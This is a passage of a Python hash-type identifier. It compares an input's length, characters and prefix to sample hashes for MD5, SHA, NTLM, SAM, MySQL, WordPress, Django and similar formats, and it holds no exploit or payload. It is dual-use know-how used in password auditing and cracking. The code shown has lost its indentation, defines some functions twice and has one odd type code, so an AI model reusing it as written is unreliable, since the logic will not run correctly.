"110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
# hash.islower() minusculas
# hash.isdigit() numerico
# hash.isalpha() letras
# hash.isalnum() alfanumerico
def CRC16(hash):
hs='4607'
if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101020")
def CRC16CCITT(hash):
hs='3d08'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101040")
def FCS16(hash):
hs='0e5b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101060")
def CRC32(hash):
hs='b33fd057'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102040")
def ADLER32(hash):
hs='0607cb42'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102020")
def CRC32B(hash):
hs='b764a0d9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102060")
def XOR32(hash):
hs='0000003f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102080")
def GHash323(hash):
hs='80000000'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103040")
def GHash325(hash):
hs='85318985'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103020")
def DESUnix(hash):
hs='ZiY8YtDKXJwYQ'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
jerar.append("104020")
def MD5Half(hash):
hs='ae11fd697ec92c7c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105060")
def MD5Middle(hash):
hs='7ec92c7c98de3fac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105040")
def MySQL(hash):
hs='63cea4673fd25f46'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105020")
def DomainCachedCredentials(hash):
hs='f42005ec1afe77967cbc83dce1b4d714'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106025")
def Haval128(hash):
hs='d6e3ec49aa0f138a619f27609022df10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106160")
def Haval128HMAC(hash):
hs='3ce8b0ffd75bc240fc7d967729cd6637'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106165")
def MD2(hash):
hs='08bbef4754d98806c373f2cd7d9a43c4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106060")
def MD2HMAC(hash):
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106120")
def MD4(hash):
hs='a2acde400e61410e79dacbdfc3413151'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106040")
def MD4HMAC(hash):
hs='6be20b66f2211fe937294c1c95d1cd4f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106100")
def MD5(hash):
hs='ae11fd697ec92c7c98de3fac23aba525'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106020")
def MD5HMAC(hash):
hs='d57e43d2c7e397bf788f66541d6fdef9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106080")
def MD5HMACWordpress(hash):
hs='3f47886719268dfa83468630948228f6'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106140")
def NTLM(hash):
hs='cc348bace876ea440a28ddaeb9fd3550'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106029")
def RAdminv2x(hash):
hs='baea31c728cbf0cd548476aa687add4b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106027")
def RipeMD128(hash):
hs='4985351cd74aff0abc5a75a0c8a54115'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106180")
def RipeMD128HMAC(hash):
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106185")
def SNEFRU128(hash):
hs='4fb58702b617ac4f7ca87ec77b93da8a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106200")
def SNEFRU128HMAC(hash):
hs='59b2b9dcc7a9a7d089cecf1b83520350'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106205")
def Tiger128(hash):
hs='c086184486ec6388ff81ec9f23528727'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106220")
def Tiger128HMAC(hash):
hs='c87032009e7c4b2ea27eb6f99723454b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106225")
def md5passsalt(hash):
hs='5634cc3b922578434d6e9342ff5913f7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106240")
def md5saltmd5pass(hash):
hs='245c5763b95ba42d4b02d44bbcd916f1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106260")
def md5saltpass(hash):
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106280")
def md5saltpasssalt(hash):
hs='469e9cdcaff745460595a7a386c4db0c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106300")
def md5saltpassusername(hash):
hs='9ae20f88189f6e3a62711608ddb6f5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106320")
def md5saltmd5pass(hash):
hs='aca2a052962b2564027ee62933d2382f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106340")
def md5saltmd5passsalt(hash):
hs='de0237dc03a8efdf6552fbe7788b2fdd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106360")
def md5saltmd5passsalt(hash):
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106380")
def md5saltmd5saltpass(hash):
hs='d8f3b3f004d387086aae24326b575b23'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106400")
def md5saltmd5md5passsalt(hash):
hs='81f181454e23319779b03d74d062b1a2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106420")
def md5username0pass(hash):
hs='e44a60f8f2106492ae16581c91edb3ba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106440")
def md5usernameLFpass(hash):
hs='654741780db415732eaee12b1b909119'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106460")
def md5usernamemd5passsalt(hash):
hs='954ac5505fd1843bbb97d1b2cda0b98f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106480")
def md5md5pass(hash):
hs='a96103d267d024583d5565436e52dfb3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106500")
def md5md5passsalt(hash):
hs='5848c73c2482d3c2c7b6af134ed8dd89'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106520")
def md5md5passmd5salt(hash):
hs='8dc71ef37197b2edba02d48c30217b32'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106540")
def md5md5saltpass(hash):
hs='9032fabd905e273b9ceb1e124631bd67'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106560")
def md5md5saltmd5pass(hash):
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106580")
def md5md5usernamepasssalt(hash):
hs='4319a3befce729b34c3105dbc29d0c40'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106600")
def md5md5md5pass(hash):
hs='ea086739755920e732d0f4d8c1b6ad8d'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106620")
def md5md5md5md5pass(hash):
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106640")
def md5md5md5md5md5pass(hash):
hs='4548d2c062933dff53928fd4ae427fc0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106660")
def md5sha1pass(hash):
hs='cb4ebaaedfd536d965c452d9569a6b1e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106680")
def md5sha1md5pass(hash):
hs='099b8a59795e07c334a696a10c0ebce0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106700")
def md5sha1md5sha1pass(hash):
hs='06e4af76833da7cc138d90602ef80070'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106720")
def md5strtouppermd5pass(hash):
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106740")
def LineageIIC4(hash):
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
jerar.append("107080")
def MD5phpBB3(hash):
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
jerar.append("107040")
def MD5Unix(hash):
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
jerar.append("107060")
def MD5Wordpress(hash):
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
jerar.append("107020")
def MD5APR(hash):
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
jerar.append("108020")
def Haval160(hash):
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109100")
def Haval160HMAC(hash):
hs='29206f83edc1d6c3f680ff11276ec20642881243'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109200")
def MySQL5(hash):
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109040")
def MySQL160bit(hash):
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
jerar.append("109060")
def RipeMD160(hash):
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109120")
def RipeMD160HMAC(hash):
hs='ca28af47653b4f21e96c1235984cb50229331359'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109180")
def SHA1(hash):
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109020")
def SHA1HMAC(hash):
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109140")
def SHA1MaNGOS(hash):
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109220")
def SHA1MaNGOS2(hash):
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109240")
def Tiger160(hash):
hs='c086184486ec6388ff81ec9f235287270429b225'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109080")
def Tiger160HMAC(hash):
hs='6603161719da5e56e1866e4f61f79496334e6a10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109160")
def sha1passsalt(hash):
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109260")
def sha1saltpass(hash):
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109280")
def sha1saltmd5pass(hash):
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109300")
def sha1saltmd5passsalt(hash):
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109320")
def sha1saltsha1pass(hash):
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109340")
def sha1saltsha1saltsha1pass(hash):
hs='cc600a2903130c945aa178396910135cc7f93c63'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109360")
def sha1usernamepass(hash):
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109380")
def sha1usernamepasssalt(hash):
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109400")
def sha1md5pass(hash):
hs='fa960056c0dea57de94776d3759fb555a15cae87'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("1094202")
def sha1md5passsalt(hash):
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109440")
def sha1md5sha1pass(hash):
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109460")
def sha1sha1pass(hash):
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109480")
def sha1sha1passsalt(hash):
hs='780d43fa11693b61875321b6b54905ee488d7760'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109500")
def sha1sha1passsubstrpass03(hash):
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109520")
def sha1sha1saltpass(hash):
hs='70506bac605485b4143ca114cbd4a3580d76a413'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109540")
def sha1sha1sha1pass(hash):
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109560")
def sha1strtolowerusernamepass(hash):
hs='79f575543061e158c2da3799f999eb7c95261f07'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109580")
def Haval192(hash):
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110040")
def Haval192HMAC(hash):
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110080")
def Tiger192(hash):
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110020")
def Tiger192HMAC(hash):
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110060")
def MD5passsaltjoomla1(hash):
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("112020")
def SHA1Django(hash):
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
jerar.append("113020")
def Haval224(hash):
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114040")
def Haval224HMAC(hash):
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114080")
def SHA224(hash):
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114020")
def SHA224HMAC(hash):
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114060")
def SHA256(hash):
hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115020")
def SHA256HMAC(hash):
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115120")
def Haval256(hash):
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115040")
def Haval256HMAC(hash):
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115140")
def GOSTR341194(hash):
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115060")
def RipeMD256(hash):
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115080")
def RipeMD256HMAC(hash):
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115160")
def SNEFRU256(hash):
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115100")
def SNEFRU256HMAC(hash):
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115180")
def SHA256md5pass(hash):
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115200")
def SHA256sha1pass(hash):
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115220")
def MD5passsaltjoomla2(hash):
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("116020")
def SAM(hash):
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
jerar.append("116040")
def SHA256Django(hash):
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
jerar.append("117020")
def RipeMD320(hash):
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118020")
def RipeMD320HMAC(hash):
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118040")
def SHA384(hash):
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119020")
def SHA384HMAC(hash):
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119040")
def SHA256s(hash):
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
jerar.append("120020")
def SHA384Django(hash):
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
jerar.append("121020")
def SHA512(hash):
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122020")
def SHA512HMAC(hash):
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122060")
def Whirlpool(hash):
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122040")
def WhirlpoolHMAC(hash):
hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122080")
print(logo)
try:
first = str(argv[1])
except:
first = None
while True:
try:
jerar=[]
print("-"*50)
if first:
h = first
else:
h = input(" HASH: ")
ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); 